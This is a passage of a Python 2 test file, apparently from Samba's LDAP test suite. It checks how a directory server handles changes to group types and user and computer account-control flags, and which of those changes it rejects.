"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_UNIVERSAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_DOMAIN_LOCAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_LOCAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_DISTRIBUTION_GLOBAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_LOCAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
# Modify operation
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
# We can change in this direction: global <-> universal <-> local
# On each step also the group type itself (security/distribution) is
# variable.
# After creation we should have a "security global group"
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Invalid attribute
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement("0",
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Security groups
# Default is "global group"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change to "local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change to "local"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_LOCAL_GROUP)
# Change to "global" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "builtin local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change to "builtin local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change to "builtin local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Distribution groups
# Default is "global group"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
# Change to local (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change to "local"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_LOCAL_GROUP)
# Change to "global" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change back to "universal"
# Try to add invalid member to group 1 - should be denied
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement(
"cn=ldaptestuser3,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Make group 2 secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_GLOBAL_GROUP)
# Both group types: this performs only random checks - all possibilities
# would require too much code.
# Default is "global group"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change to "local" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change to "local"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_DISTRIBUTION_LOCAL_GROUP)
# Change to "global" (shouldn't work)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_DISTRIBUTION_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Change back to "universal"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_UNIVERSAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_UNIVERSAL_GROUP)
# Change back to "global"
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(
str(GTYPE_SECURITY_GLOBAL_GROUP),
FLAG_MOD_REPLACE, "groupType")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
def test_userAccountControl(self):
"""Test the userAccountControl behaviour"""
print "Testing userAccountControl behaviour\n"
# With a user object
# Add operation
# As user you can only set a normal account.
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can set a interdomain trust account.
# Invalid attribute
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# This has to wait until s4 supports it (needs a password module change)
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_NORMAL_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD)})
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": str(UF_TEMP_DUPLICATE_ACCOUNT)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# This isn't supported yet in s4
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_SERVER_TRUST_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
#
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_WORKSTATION_TRUST_ACCOUNT)})
# except LdbError, (num, _):
# self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# ldb.add({
# "dn": "cn=ldaptestuser,cn=users," + self.base_dn,
# "objectclass": "user",
# "userAccountControl": str(UF_INTERDOMAIN_TRUST_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
# delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Modify operation
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
# After creation we should have a normal account
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE != 0)
# As user you can only switch from a normal account to a workstation
# trust account and back.
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can switch to a interdomain trust account.
# Invalid attribute
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement("0",
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# This has to wait until s4 supports it (needs a password module change)
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_NORMAL_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_TEMP_DUPLICATE_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
# This isn't supported yet in s4
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_SERVER_TRUST_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_WORKSTATION_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_INTERDOMAIN_TRUST_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
# With a computer object
# Add operation
# As computer you can set a normal account and a server trust account.
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can set a interdomain trust account.
# Invalid attribute
try:
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# This has to wait until s4 supports it (needs a password module change)
# try:
# ldb.add({
# "dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
# "objectclass": "computer",
# "userAccountControl": str(UF_NORMAL_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD)})
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_TEMP_DUPLICATE_ACCOUNT)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_SERVER_TRUST_ACCOUNT)})
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_WORKSTATION_TRUST_ACCOUNT)})
except LdbError, (num, _):
self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# ldb.add({
# "dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
# "objectclass": "computer",
# "userAccountControl": str(UF_INTERDOMAIN_TRUST_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
# delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# Modify operation
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer"})
# After creation we should have a normal account
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE != 0)
# As computer you can switch from a normal account to a workstation
